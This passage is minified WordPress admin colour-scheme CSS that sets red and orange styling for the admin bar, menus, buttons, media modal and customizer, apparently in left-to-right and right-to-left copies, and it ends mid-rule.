.awaiting-mod{color:#fff;background:rgb(190.4217021277,53.969787234,48.8782978723)}#collapse-button{color:hsl(2.1582733813,7%,95%)}#collapse-button:focus,#collapse-button:hover{color:rgb(247.3869565217,227.0108695652,211.1130434783)}#wpadminbar{color:#fff;background:#cf4944}#wpadminbar .ab-item,#wpadminbar a.ab-item,#wpadminbar>#wp-toolbar span.ab-label,#wpadminbar>#wp-toolbar span.noticon{color:#fff}#wpadminbar .ab-icon,#wpadminbar .ab-icon:before,#wpadminbar .ab-item:after,#wpadminbar .ab-item:before{color:hsl(2.1582733813,7%,95%)}#wpadminbar .ab-top-menu>li.menupop.hover>.ab-item,#wpadminbar.nojq .quicklinks .ab-top-menu>li>.ab-item:focus,#wpadminbar.nojs .ab-top-menu>li.menupop:hover>.ab-item,#wpadminbar:not(.mobile) .ab-top-menu>li:hover>.ab-item,#wpadminbar:not(.mobile) .ab-top-menu>li>.ab-item:focus{color:rgb(247.3869565217,227.0108695652,211.1130434783);background:rgb(190.4217021277,53.969787234,48.8782978723)}#wpadminbar:not(.mobile)>#wp-toolbar a:focus span.ab-label,#wpadminbar:not(.mobile)>#wp-toolbar li.hover span.ab-label,#wpadminbar:not(.mobile)>#wp-toolbar li:hover span.ab-label{color:rgb(247.3869565217,227.0108695652,211.1130434783)}#wpadminbar:not(.mobile) li:hover #adminbarsearch:before,#wpadminbar:not(.mobile) li:hover .ab-icon:before,#wpadminbar:not(.mobile) li:hover .ab-item:after,#wpadminbar:not(.mobile) li:hover .ab-item:before{color:rgb(247.3869565217,227.0108695652,211.1130434783)}#wpadminbar .menupop .ab-sub-wrapper{background:rgb(190.4217021277,53.969787234,48.8782978723)}#wpadminbar .quicklinks .menupop ul.ab-sub-secondary,#wpadminbar .quicklinks .menupop ul.ab-sub-secondary .ab-submenu{background:rgb(207.3164148936,107.1221761059,103.3835851064)}#wpadminbar .ab-submenu .ab-item,#wpadminbar .quicklinks .menupop ul li a,#wpadminbar .quicklinks .menupop.hover ul li a,#wpadminbar.nojs .quicklinks .menupop:hover ul li a{color:rgb(240.6,200.4,198.9)}#wpadminbar .menupop .menupop>.ab-item:before,#wpadminbar .quicklinks li .blavatar{color:hsl(2.1582733813,7%,95%)}#wpadminbar .quicklinks .ab-sub-wrapper .menupop.hover>a,#wpadminbar .quicklinks .menupop ul li a:focus,#wpadminbar .quicklinks .menupop ul li a:focus strong,#wpadminbar .quicklinks .menupop ul li a:hover,#wpadminbar .quicklinks .menupop ul li a:hover strong,#wpadminbar .quicklinks .menupop.hover ul li a:focus,#wpadminbar .quicklinks .menupop.hover ul li a:hover,#wpadminbar li #adminbarsearch.adminbar-focused:before,#wpadminbar li .ab-item:focus .ab-icon:before,#wpadminbar li .ab-item:focus:before,#wpadminbar li a:focus .ab-icon:before,#wpadminbar li.hover .ab-icon:before,#wpadminbar li.hover .ab-item:before,#wpadminbar li:hover #adminbarsearch:before,#wpadminbar li:hover .ab-icon:before,#wpadminbar li:hover .ab-item:before,#wpadminbar.nojs .quicklinks .menupop:hover ul li a:focus,#wpadminbar.nojs .quicklinks .menupop:hover ul li a:hover{color:rgb(247.3869565217,227.0108695652,211.1130434783)}#wpadminbar .menupop .menupop>.ab-item:hover:before,#wpadminbar .quicklinks .ab-sub-wrapper .menupop.hover>a .blavatar,#wpadminbar .quicklinks li a:focus .blavatar,#wpadminbar .quicklinks li a:hover .blavatar,#wpadminbar.mobile .quicklinks .hover .ab-icon:before,#wpadminbar.mobile .quicklinks .hover .ab-item:before{color:rgb(247.3869565217,227.0108695652,211.1130434783)}#wpadminbar.mobile .quicklinks .ab-icon:before,#wpadminbar.mobile .quicklinks .ab-item:before{color:hsl(2.1582733813,7%,95%)}#wpadminbar #adminbarsearch:before{color:hsl(2.1582733813,7%,95%)}#wpadminbar>#wp-toolbar>#wp-admin-bar-top-secondary>#wp-admin-bar-search #adminbarsearch input.adminbar-input:focus{color:#fff;background:rgb(214.2919148936,100.6485106383,96.4080851064)}#wpadminbar #wp-admin-bar-recovery-mode{color:#fff;background-color:#ccaf0b}#wpadminbar #wp-admin-bar-recovery-mode .ab-item,#wpadminbar #wp-admin-bar-recovery-mode a.ab-item{color:#fff}#wpadminbar .ab-top-menu>#wp-admin-bar-recovery-mode.hover>.ab-item,#wpadminbar.nojq .quicklinks .ab-top-menu>#wp-admin-bar-recovery-mode>.ab-item:focus,#wpadminbar:not(.mobile) .ab-top-menu>#wp-admin-bar-recovery-mode:hover>.ab-item,#wpadminbar:not(.mobile) .ab-top-menu>#wp-admin-bar-recovery-mode>.ab-item:focus{color:#fff;background-color:rgb(183.6,157.5,9.9)}#wpadminbar .quicklinks li#wp-admin-bar-my-account.with-avatar>a img{border-color:rgb(214.2919148936,100.6485106383,96.4080851064);background-color:rgb(214.2919148936,100.6485106383,96.4080851064)}#wpadminbar #wp-admin-bar-user-info .display-name{color:#fff}#wpadminbar #wp-admin-bar-user-info a:hover .display-name{color:rgb(247.3869565217,227.0108695652,211.1130434783)}#wpadminbar #wp-admin-bar-user-info .username{color:rgb(240.6,200.4,198.9)}.wp-pointer .wp-pointer-content h3{background-color:#dd823b;border-color:rgb(216.8782608696,116.1847826087,37.6217391304)}.wp-pointer .wp-pointer-content h3:before{color:#dd823b}.wp-pointer.wp-pointer-top .wp-pointer-arrow,.wp-pointer.wp-pointer-top .wp-pointer-arrow-inner,.wp-pointer.wp-pointer-undefined .wp-pointer-arrow,.wp-pointer.wp-pointer-undefined .wp-pointer-arrow-inner{border-bottom-color:#dd823b}.media-item .bar,.media-progress-bar div{background-color:#dd823b}.details.attachment{box-shadow:inset 0 0 0 3px #fff,inset 0 0 0 7px #dd823b}.attachment.details .check{background-color:#dd823b;box-shadow:0 0 0 1px #fff,0 0 0 2px #dd823b}.media-selection .attachment.selection.details .thumbnail{box-shadow:0 0 0 1px #fff,0 0 0 3px #dd823b}.theme-browser .theme.active .theme-name,.theme-browser .theme.add-new-theme a:focus:after,.theme-browser .theme.add-new-theme a:hover:after{background:#dd823b}.theme-browser .theme.add-new-theme a:focus span:after,.theme-browser .theme.add-new-theme a:hover span:after{color:#dd823b}.theme-filter.current,.theme-section.current{border-bottom-color:#cf4944}body.more-filters-opened .more-filters{color:#fff;background-color:#cf4944}body.more-filters-opened .more-filters:before{color:#fff}body.more-filters-opened .more-filters:focus,body.more-filters-opened .more-filters:hover{background-color:#dd823b;color:#fff}body.more-filters-opened .more-filters:focus:before,body.more-filters-opened .more-filters:hover:before{color:#fff}.widgets-chooser li.widgets-chooser-selected{background-color:#dd823b;color:#fff}.widgets-chooser li.widgets-chooser-selected:before,.widgets-chooser li.widgets-chooser-selected:focus:before{color:#fff}.nav-menus-php .item-edit:focus:before{box-shadow:0 0 0 1px rgb(228.5391304348,157.7173913043,102.4608695652),0 0 2px 1px #dd823b}div#wp-responsive-toggle a:before{color:hsl(2.1582733813,7%,95%)}.wp-responsive-open div#wp-responsive-toggle a{border-color:transparent;background:#dd823b}.wp-responsive-open #wpadminbar #wp-admin-bar-menu-toggle a{background:rgb(190.4217021277,53.969787234,48.8782978723)}.wp-responsive-open #wpadminbar #wp-admin-bar-menu-toggle .ab-icon:before{color:hsl(2.1582733813,7%,95%)}.mce-container.mce-menu .mce-menu-item-normal.mce-active,.mce-container.mce-menu .mce-menu-item-preview.mce-active,.mce-container.mce-menu .mce-menu-item.mce-selected,.mce-container.mce-menu .mce-menu-item:focus,.mce-container.mce-menu .mce-menu-item:hover{background:#dd823b}.wp-core-ui #customize-controls .control-section .accordion-section-title:focus,.wp-core-ui #customize-controls .control-section .accordion-section-title:hover,.wp-core-ui #customize-controls .control-section.open .accordion-section-title,.wp-core-ui #customize-controls .control-section:hover>.accordion-section-title{color:#0073aa;border-left-color:#dd823b}.wp-core-ui .customize-controls-close:focus,.wp-core-ui .customize-controls-close:hover,.wp-core-ui .customize-controls-preview-toggle:focus,.wp-core-ui .customize-controls-preview-toggle:hover{color:#0073aa;border-top-color:#dd823b}.wp-core-ui .customize-panel-back:focus,.wp-core-ui .customize-panel-back:hover,.wp-core-ui .customize-section-back:focus,.wp-core-ui .customize-section-back:hover{color:#0073aa;border-left-color:#dd823b}.wp-core-ui #customize-controls .customize-info.open.active-menu-screen-options .customize-help-toggle:active,.wp-core-ui #customize-controls .customize-info.open.active-menu-screen-options .customize-help-toggle:focus,.wp-core-ui #customize-controls .customize-info.open.active-menu-screen-options .customize-help-toggle:hover,.wp-core-ui .active-menu-screen-options .customize-screen-options-toggle,.wp-core-ui .customize-screen-options-toggle:active,.wp-core-ui .customize-screen-options-toggle:focus,.wp-core-ui .customize-screen-options-toggle:hover{color:#0073aa}.wp-core-ui #available-menu-items .item-add:focus:before,.wp-core-ui #customize-controls .customize-info .customize-help-toggle:focus:before,.wp-core-ui #customize-save-button-wrapper .save:focus,.wp-core-ui #publish-settings:focus,.wp-core-ui .customize-screen-options-toggle:focus:before,.wp-core-ui .menu-item-bar .item-delete:focus:before,.wp-core-ui.wp-customizer button:focus .toggle-indicator:before{box-shadow:0 0 0 1px rgb(228.5391304348,157.7173913043,102.4608695652),0 0 2px 1px #dd823b}.wp-core-ui #customize-controls .customize-info .customize-help-toggle:focus,.wp-core-ui #customize-controls .customize-info .customize-help-toggle:hover,.wp-core-ui #customize-controls .customize-info.open .customize-help-toggle{color:#0073aa}.wp-core-ui .control-panel-themes .customize-themes-section-title:focus,.wp-core-ui .control-panel-themes .customize-themes-section-title:hover{border-left-color:#dd823b;color:#0073aa}.wp-core-ui .control-panel-themes .theme-section .customize-themes-section-title.selected:after{background:#dd823b}.wp-core-ui .control-panel-themes .customize-themes-section-title.selected{color:#0073aa}.wp-core-ui #customize-outer-theme-controls .control-section .accordion-section-title:focus:after,.wp-core-ui #customize-outer-theme-controls .control-section .accordion-section-title:hover:after,.wp-core-ui #customize-outer-theme-controls .control-section.open .accordion-section-title:after,.wp-core-ui #customize-outer-theme-controls .control-section:hover>.accordion-section-title:after,.wp-core-ui #customize-theme-controls .control-section .accordion-section-title:focus:after,.wp-core-ui #customize-theme-controls .control-section .accordion-section-title:hover:after,.wp-core-ui #customize-theme-controls .control-section.open .accordion-section-title:after,.wp-core-ui #customize-theme-controls .control-section:hover>.accordion-section-title:after{color:#0073aa}.wp-core-ui .customize-control .attachment-media-view .button-add-media:focus{background-color:#fbfbfc;border-color:#dd823b;border-style:solid;box-shadow:0 0 0 1px #dd823b;outline:2px solid transparent}.wp-core-ui .wp-full-overlay-footer .devices button.active:hover,.wp-core-ui .wp-full-overlay-footer .devices button:focus{border-bottom-color:#dd823b}.wp-core-ui .wp-full-overlay-footer .devices button:focus:before,.wp-core-ui .wp-full-overlay-footer .devices button:hover:before{color:#dd823b}.wp-core-ui .wp-full-overlay .collapse-sidebar:focus,.wp-core-ui .wp-full-overlay .collapse-sidebar:hover{color:#dd823b}.wp-core-ui .wp-full-overlay .collapse-sidebar:focus .collapse-sidebar-arrow,.wp-core-ui .wp-full-overlay .collapse-sidebar:hover .collapse-sidebar-arrow{box-shadow:0 0 0 1px rgb(228.5391304348,157.7173913043,102.4608695652),0 0 2px 1px #dd823b}.wp-core-ui.wp-customizer .theme-overlay .theme-header .close:focus,.wp-core-ui.wp-customizer .theme-overlay .theme-header .close:hover,.wp-core-ui.wp-customizer .theme-overlay .theme-header .left:focus,.wp-core-ui.wp-customizer .theme-overlay .theme-header .left:hover,.wp-core-ui.wp-customizer .theme-overlay .theme-header .right:focus,.wp-core-ui.wp-customizer .theme-overlay .theme-header .right:hover{border-bottom-color:#dd823b;color:#0073aa}/*! This file is auto-generated */ body{background:#f0f0f0}a{color:#0073aa}a:active,a:focus,a:hover{color:rgb(0,149.5,221)}#post-body #visibility:before,#post-body .misc-pub-post-status:before,#post-body .misc-pub-revisions:before,.curtime #timestamp:before,span.wp-media-buttons-icon:before{color:currentColor}.wp-core-ui .button-link,.wp-core-ui .button.button-link{color:var(--wp-admin-theme-color)}.wp-core-ui .button-link:active,.wp-core-ui .button-link:hover,.wp-core-ui .button.button-link:active,.wp-core-ui .button.button-link:hover{color:var(--wp-admin-theme-color-darker-20)}.wp-core-ui .button-link:focus,.wp-core-ui .button.button-link:focus{color:var(--wp-admin-theme-color);border-radius:2px;box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color);outline:1px solid transparent}.wp-core-ui .button-link:disabled,.wp-core-ui .button-link[aria-disabled=true],.wp-core-ui .button.button-link:disabled,.wp-core-ui .button.button-link[aria-disabled=true]{color:#949494}.media-modal .delete-attachment,.media-modal .trash-attachment,.media-modal .untrash-attachment,.wp-core-ui .button-link-delete{color:#cc1818}.media-modal .delete-attachment:focus,.media-modal .delete-attachment:hover,.media-modal .trash-attachment:focus,.media-modal .trash-attachment:hover,.media-modal .untrash-attachment:focus,.media-modal .untrash-attachment:hover,.wp-core-ui .button-link-delete:focus,.wp-core-ui .button-link-delete:hover{color:rgb(230.6842105263,48.3157894737,48.3157894737)}input[type=checkbox]:checked{background:var(--wp-admin-theme-color);border-color:var(--wp-admin-theme-color)}input[type=radio]:checked{background:var(--wp-admin-theme-color);border-color:var(--wp-admin-theme-color)}.wp-core-ui input[type=reset]:active,.wp-core-ui input[type=reset]:hover{color:rgb(0,149.5,221)}input[type=color]:focus,input[type=date]:focus,input[type=datetime-local]:focus,input[type=datetime]:focus,input[type=email]:focus,input[type=month]:focus,input[type=number]:focus,input[type=password]:focus,input[type=search]:focus,input[type=tel]:focus,input[type=text]:focus,input[type=time]:focus,input[type=url]:focus,input[type=week]:focus,select:focus,textarea:focus{border-color:var(--wp-admin-theme-color);box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color)}input[type=checkbox]:focus,input[type=radio]:focus{border-color:#1e1e1e;box-shadow:0 0 0 2px #fff,0 0 0 4px var(--wp-admin-theme-color);outline:2px solid transparent}.wp-core-ui select:focus{border-color:var(--wp-admin-theme-color);box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color)}.wp-tags-autocomplete .ui-state-focus,.wp-tags-autocomplete [aria-selected=true]{background-color:var(--wp-admin-theme-color)}#pass1-text:focus,#pass1:focus{box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color)}.mailserver-pass-wrap .button.wp-hide-pw:focus{border-color:var(--wp-admin-theme-color);box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color)}.wp-core-ui .button{background:0 0;border:1px solid var(--wp-admin-theme-color);border-radius:2px;color:var(--wp-admin-theme-color)}.wp-core-ui .button:hover{background:rgba(var(--wp-admin-theme-color--rgb),.04);border-color:var(--wp-admin-theme-color-darker-20);color:var(--wp-admin-theme-color-darker-20)}.wp-core-ui .button:focus{background:0 0;border-color:var(--wp-admin-theme-color);color:var(--wp-admin-theme-color);box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color);outline:1px solid transparent}.wp-core-ui .button:active{background:rgba(var(--wp-admin-theme-color--rgb),.08);border-color:var(--wp-admin-theme-color-darker-20);color:var(--wp-admin-theme-color-darker-20);box-shadow:none}.wp-core-ui .button.disabled,.wp-core-ui .button:disabled{background:0 0;border-color:#ddd;color:#949494;cursor:not-allowed}.wp-core-ui .button-secondary{background:0 0;border:1px solid var(--wp-admin-theme-color);border-radius:2px;color:var(--wp-admin-theme-color)}.wp-core-ui .button-secondary:hover{background:rgba(var(--wp-admin-theme-color--rgb),.04);border-color:var(--wp-admin-theme-color-darker-20);color:var(--wp-admin-theme-color-darker-20)}.wp-core-ui .button-secondary:focus{background:0 0;border-color:var(--wp-admin-theme-color);color:var(--wp-admin-theme-color);box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color);outline:1px solid transparent}.wp-core-ui .button-secondary:active{background:rgba(var(--wp-admin-theme-color--rgb),.08);border-color:var(--wp-admin-theme-color-darker-20);color:var(--wp-admin-theme-color-darker-20);box-shadow:none}.wp-core-ui .button-secondary.disabled,.wp-core-ui .button-secondary:disabled{background:0 0;border-color:#ddd;color:#949494;cursor:not-allowed}.wp-core-ui .button-primary{background:var(--wp-admin-theme-color);border-color:transparent;border-radius:2px;color:#fff}.wp-core-ui .button-primary:hover{background:var(--wp-admin-theme-color-darker-10);border-color:transparent;color:#fff}.wp-core-ui .button-primary:focus{background:var(--wp-admin-theme-color);border-color:transparent;color:#fff;box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color),inset 0 0 0 1px #fff;outline:1px solid transparent}.wp-core-ui .button-primary:active{background:var(--wp-admin-theme-color-darker-20);border-color:transparent;color:#fff}.wp-core-ui .button-primary.disabled,.wp-core-ui .button-primary:disabled{background:#f0f0f0;border-color:transparent;color:#949494;cursor:not-allowed}.wp-core-ui .button-primary.active,.wp-core-ui .button-primary.active:focus,.wp-core-ui .button-primary.active:hover{background:var(--wp-admin-theme-color-darker-10);color:#fff;border-color:transparent;box-shadow:none}.wp-core-ui .button-group>.button.active{border-color:var(--wp-admin-theme-color);background:rgba(var(--wp-admin-theme-color--rgb),.08)}.wp-core-ui .wp-ui-primary{color:#fff;background-color:#cf4944}.wp-core-ui .wp-ui-text-primary{color:#cf4944}.wp-core-ui .wp-ui-highlight{color:#fff;background-color:#dd823b}.wp-core-ui .wp-ui-text-highlight{color:#dd823b}.wp-core-ui .wp-ui-notification{color:#fff;background-color:#ccaf0b}.wp-core-ui .wp-ui-text-notification{color:#ccaf0b}.wp-core-ui .wp-ui-text-icon{color:hsl(2.1582733813,7%,95%)}.wrap .page-title-action{background:0 0;border:1px solid var(--wp-admin-theme-color);border-radius:2px;color:var(--wp-admin-theme-color)}.wrap .page-title-action:hover{background:rgba(var(--wp-admin-theme-color--rgb),.04);border-color:var(--wp-admin-theme-color-darker-20);color:var(--wp-admin-theme-color-darker-20)}.wrap .page-title-action:focus{background:0 0;border-color:var(--wp-admin-theme-color);color:var(--wp-admin-theme-color);box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color);outline:1px solid transparent}.wrap .page-title-action:active{background:rgba(var(--wp-admin-theme-color--rgb),.08);border-color:var(--wp-admin-theme-color-darker-20);color:var(--wp-admin-theme-color-darker-20);box-shadow:none}.view-switch a.current:before{color:#cf4944}.view-switch a:hover:before{color:#ccaf0b}#adminmenu,#adminmenuback,#adminmenuwrap{background:#cf4944}#adminmenu a{color:#fff}#adminmenu div.wp-menu-image:before{color:hsl(2.1582733813,7%,95%)}#adminmenu a:hover,#adminmenu li.menu-top:hover,#adminmenu li.opensub>a.menu-top,#adminmenu li>a.menu-top:focus{color:#fff;background-color:#dd823b}#adminmenu li.menu-top:hover div.wp-menu-image:before,#adminmenu li.opensub>a.menu-top div.wp-menu-image:before{color:#fff}.about-wrap .nav-tab-active,.nav-tab-active,.nav-tab-active:hover{background-color:#f0f0f0;border-bottom-color:#f0f0f0}#adminmenu .wp-has-current-submenu .wp-submenu,#adminmenu .wp-has-current-submenu.opensub .wp-submenu,#adminmenu .wp-submenu,#adminmenu a.wp-has-current-submenu:focus+.wp-submenu{background:rgb(190.4217021277,53.969787234,48.8782978723)}#adminmenu li.wp-has-submenu.wp-not-current-submenu.opensub:hover:after,#adminmenu li.wp-has-submenu.wp-not-current-submenu:focus-within:after{border-left-color:rgb(190.4217021277,53.969787234,48.8782978723)}#adminmenu .wp-submenu .wp-submenu-head{color:rgb(240.6,200.4,198.9)}#adminmenu .wp-has-current-submenu .wp-submenu a,#adminmenu .wp-has-current-submenu.opensub .wp-submenu a,#adminmenu .wp-submenu a,#adminmenu a.wp-has-current-submenu:focus+.wp-submenu a{color:rgb(240.6,200.4,198.9)}#adminmenu .wp-has-current-submenu .wp-submenu a:focus,#adminmenu .wp-has-current-submenu .wp-submenu a:hover,#adminmenu .wp-has-current-submenu.opensub .wp-submenu a:focus,#adminmenu .wp-has-current-submenu.opensub .wp-submenu a:hover,#adminmenu .wp-submenu a:focus,#adminmenu .wp-submenu a:hover,#adminmenu a.wp-has-current-submenu:focus+.wp-submenu a:focus,#adminmenu a.wp-has-current-submenu:focus+.wp-submenu a:hover{color:rgb(247.3869565217,227.0108695652,211.1130434783)}#adminmenu .wp-has-current-submenu.opensub .wp-submenu li.current a,#adminmenu .wp-submenu li.current a,#adminmenu a.wp-has-current-submenu:focus+.wp-submenu li.current a{color:#fff}#adminmenu .wp-has-current-submenu.opensub .wp-submenu li.current a:focus,#adminmenu .wp-has-current-submenu.opensub .wp-submenu li.current a:hover,#adminmenu .wp-submenu li.current a:focus,#adminmenu .wp-submenu li.current a:hover,#adminmenu a.wp-has-current-submenu:focus+.wp-submenu li.current a:focus,#adminmenu a.wp-has-current-submenu:focus+.wp-submenu li.current a:hover{color:rgb(247.3869565217,227.0108695652,211.1130434783)}ul#adminmenu a.wp-has-current-submenu:after,ul#adminmenu>li.current>a.current:after{border-left-color:#f0f0f0}#adminmenu li.current a.menu-top,#adminmenu li.wp-has-current-submenu .wp-submenu .wp-submenu-head,#adminmenu li.wp-has-current-submenu a.wp-has-current-submenu,.folded #adminmenu li.current.menu-top{color:#fff;background:#dd823b}#adminmenu a.current:hover div.wp-menu-image:before,#adminmenu li a:focus div.wp-menu-image:before,#adminmenu li.current div.wp-menu-image:before,#adminmenu li.opensub div.wp-menu-image:before,#adminmenu li.wp-has-current-submenu a:focus div.wp-menu-image:before,#adminmenu li.wp-has-current-submenu div.wp-menu-image:before,#adminmenu li.wp-has-current-submenu.opensub div.wp-menu-image:before,#adminmenu li:hover div.wp-menu-image:before{color:#fff}#adminmenu .awaiting-mod,#adminmenu .menu-counter,#adminmenu .update-plugins{color:#fff;background:#ccaf0b}#adminmenu li a.wp-has-current-submenu .update-plugins,#adminmenu li.current a .awaiting-mod,#adminmenu li.menu-top:hover>a .update-plugins,#adminmenu li:hover a .awaiting-mod{color:#fff;background:rgb(190.4217021277,53.969787234,48.8782978723)}#collapse-button{color:hsl(2.1582733813,7%,95%)}#collapse-button:focus,#collapse-button:hover{color:rgb(247.3869565217,227.0108695652,211.1130434783)}#wpadminbar{color:#fff;background:#cf4944}#wpadminbar .ab-item,#wpadminbar a.ab-item,#wpadminbar>#wp-toolbar span.ab-label,#wpadminbar>#wp-toolbar span.noticon{color:#fff}#wpadminbar .ab-icon,#wpadminbar .ab-icon:before,#wpadminbar .ab-item:after,#wpadminbar .ab-item:before{color:hsl(2.1582733813,7%,95%)}#wpadminbar .ab-top-menu>li.menupop.hover>.ab-item,#wpadminbar.nojq .quicklinks .ab-top-menu>li>.ab-item:focus,#wpadminbar.nojs .ab-top-menu>li.menupop:hover>.ab-item,#wpadminbar:not(.mobile) .ab-top-menu>li:hover>.ab-item,#wpadminbar:not(.mobile) .ab-top-menu>li>.ab-item:focus{color:rgb(247.3869565217,227.0108695652,211.1130434783);background:rgb(190.4217021277,53.969787234,48.8782978723)}#wpadminbar:not(.mobile)>#wp-toolbar a:focus span.ab-label,#wpadminbar:not(.mobile)>#wp-toolbar li.hover span.ab-label,#wpadminbar:not(.mobile)>#wp-toolbar li:hover span.ab-label{color:rgb(247.3869565217,227.0108695652,211.1130434783)}#wpadminbar:not(.mobile) li:hover #adminbarsearch:before,#wpadminbar:not(.mobile) li:hover .ab-icon:before,#wpadminbar:not(.mobile) li:hover .ab-item:after,#wpadminbar:not(.mobile) li:hover .ab-item:before{color:rgb(247.3869565217,227.0108695652,211.1130434783)}#wpadminbar .menupop .ab-sub-wrapper{background:rgb(190.4217021277,53.969787234,48.8782978723)}#wpadminbar .quicklinks .menupop ul.ab-sub-secondary,#wpadminbar .quicklinks .menupop ul.ab-sub-secondary .ab-submenu{background:rgb(207.3164148936,107.1221761059,103.3835851064)}#wpadminbar .ab-submenu .ab-item,#wpadminbar .quicklinks .menupop ul li a,#wpadminbar .quicklinks .menupop.hover ul li a,#wpadminbar.nojs .quicklinks .menupop:hover ul li a{color:rgb(240.6,200.4,198.9)}#wpadminbar .menupop .menupop>.ab-item:before,#wpadminbar .quicklinks li .blavatar{color:hsl(2.1582733813,7%,95%)}#wpadminbar .quicklinks .ab-sub-wrapper .menupop.hover>a,#wpadminbar .quicklinks .menupop ul li a:focus,#wpadminbar .quicklinks .menupop ul li a:focus strong,#wpadminbar .quicklinks .menupop ul li a:hover,#wpadminbar .quicklinks .menupop ul li a:hover strong,#wpadminbar .quicklinks .menupop.hover ul li a:focus,#wpadminbar .quicklinks .menupop.hover ul li a:hover,#wpadminbar li #adminbarsearch.adminbar-focused:before,#wpadminbar li .ab-item:focus .ab-icon:before,#wpadminbar li .ab-item:focus:before,#wpadminbar li a:focus .ab-icon:before,#wpadminbar li.hover .ab-icon:before,#wpadminbar li.hover .ab-item:before,#wpadminbar li:hover #adminbarsearch:before,#wpadminbar li:hover .ab-icon:before,#wpadminbar li:hover .ab-item:before,#wpadminbar.nojs .quicklinks .menupop:hover ul li a:focus,#wpadminbar.nojs .quicklinks .menupop:hover ul li a:hover{color:rgb(247.3869565217,227.0108695652,211.1130434783)}#wpadminbar .menupop .menupop>.ab-item:hover:before,#wpadminbar .quicklinks .ab-sub-wrapper .menupop.hover>a .blavatar,#wpadminbar .quicklinks li a:focus .blavatar,#wpadminbar .quicklinks li a:hover .blavatar,#wpadminbar.mobile .quicklinks .hover .ab-icon:before,#wpadminbar.mobile .quicklinks .hover .ab-item:before{color:rgb(247.3869565217,227.0108695652,211.1130434783)}#wpadminbar.mobile .quicklinks .ab-icon:before,#wpadminbar.mobile .quicklinks .ab-item:before{color:hsl(2.1582733813,7%,95%)}#wpadminbar #adminbarsearch:before{color:hsl(2.1582733813,7%,95%)}#wpadminbar>#wp-toolbar>#wp-admin-bar-top-secondary>#wp-admin-bar-search #adminbarsearch input.adminbar-input:focus{color:#fff;background:rgb(214.2919148936,100.6485106383,96.4080851064)}#wpadminbar #wp-admin-bar-recovery-mode{color:#fff;background-color:#ccaf0b}#wpadminbar #wp-admin-bar-recovery-mode .ab-item,#wpadminbar #wp-admin-bar-recovery-mode a.ab-item{color:#fff}#wpadminbar .ab-top-menu>#wp-admin-bar-recovery-mode.hover>.ab-item,#wpadminbar.nojq .quicklinks .ab-top-menu>#wp-admin-bar-recovery-mode>.ab-item:focus,#wpadminbar:not(.mobile) .ab-top-menu>#wp-admin-bar-recovery-mode:hover>.ab-item,#wpadminbar:not(.mobile) .ab-top-menu>#wp-admin-bar-recovery-mode>.ab-item:focus{color:#fff;background-color:rgb(183.6,157.5,9.9)}#wpadminbar .quicklinks li#wp-admin-bar-my-account.with-avatar>a img{border-color:rgb(214.2919148936,100.6485106383,96.4080851064);background-color:rgb(214.2919148936,100.6485106383,96.4080851064)}#wpadminbar #wp-admin-bar-user-info .display-name{color:#fff}#wpadminbar #wp-admin-bar-user-info a:hover .display-name{color:rgb(247.3869565217,227.0108695652,211.1130434783)}#wpadminbar #wp-admin-bar-user-info .username{color:rgb(240.6,200.4,198.9)}.wp-pointer .wp-pointer-content h3{background-color:#dd823b;border-color:rgb(216.8782608696,116.1847826087,37.6217391304)}.wp-pointer .wp-pointer-content h3:before{color:#dd823b}.wp-pointer.wp-pointer-top .wp-pointer-arrow,.wp-pointer.wp-pointer-top .wp-pointer-arrow-inner,.wp-pointer.wp-pointer-undefined .wp-pointer-arrow,.wp-pointer.wp-pointer-undefined .wp-pointer-arrow-inner{border-bottom-color:#dd823b}.media-item .bar,.media-progress-bar div{background-color:#dd823b}.details.attachment{box-shadow:inset 0 0 0 3px #fff,inset 0 0 0 7px #dd823b}.attachment.details .check{background-color:#dd823b;box-shadow:0 0 0 1px #fff,0 0 0 2px #dd823b}.media-selection .attachment.selection.details .thumbnail{box-shadow:0 0 0 1px #fff,0 0 0 3px #dd823b}.theme-browser .theme.active .theme-name,.theme-browser .theme.add-new-theme a:focus:after,.theme-browser .theme.add-new-theme a:hover:after{background:#dd823b}.theme-browser .theme.add-new-theme a:focus span:after,.theme-browser .theme.add-new-theme a:hover span:after{color:#dd823b}.theme-filter.current,.theme-section.current{border-bottom-color:#cf4944}body.more-filters-opened .more-filters{color:#fff;background-color:#cf4944}body.more-filters-opened .more-filters:before{color:#fff}body.more-filters-opened .more-filters:focus,body.more-filters-opened .more-filters:hover{background-color:#dd823b;color:#fff}body.more-filters-opened .more-filters:focus:before,body.more-filters-opened .more-filters:hover:before{color:#fff}.widgets-chooser li.widgets-chooser-selected{background-color:#dd823b;color:#fff}.widgets-chooser li.widgets-chooser-selected:before,.widgets-chooser li.widgets-chooser-selected:focus:before{color:#fff}.nav-menus-php .item-edit:focus:before{box-shadow:0 0 0 1px rgb(228.5391304348,157.7173913043,102.4608695652),0 0 2px 1px #dd823b}div#wp-responsive-toggle a:before{color:hsl(2.1582733813,7%,95%)}.wp-responsive-open div#wp-responsive-toggle a{border-color:transparent;background:#dd823b}.wp-responsive-open #wpadminbar #wp-admin-bar-menu-toggle a{background:rgb(190.4217021277,53.969787234,48.8782978723)}.wp-responsive-open #wpadminbar #wp-admin-bar-menu-toggle .ab-icon:before{color:hsl(2.1582733813,7%,95%)}.mce-container.mce-menu .mce-menu-item-normal.mce-active,.mce-container.mce-menu .mce-menu-item-preview.mce-active,.mce-container.mce-menu .mce-menu-item.mce-selected,.mce-container.mce-menu .mce-menu-item:focus,.mce-container.mce-menu .mce-menu-item:hover{background:#dd823b}.wp-core-ui #customize-controls .control-section .accordion-section-title:focus,.wp-core-ui #customize-controls .control-section .accordion-section-title:hover,.wp-core-ui #customize-controls .control-section.open .accordion-section-title,.wp-core-ui #customize-controls .control-section:hover>.accordion-section-title{color:#0073aa;border-right-color:#dd823b}.wp-core-ui .customize-controls-close:focus,.wp-core-ui .customize-controls-close:hover,.wp-core-ui 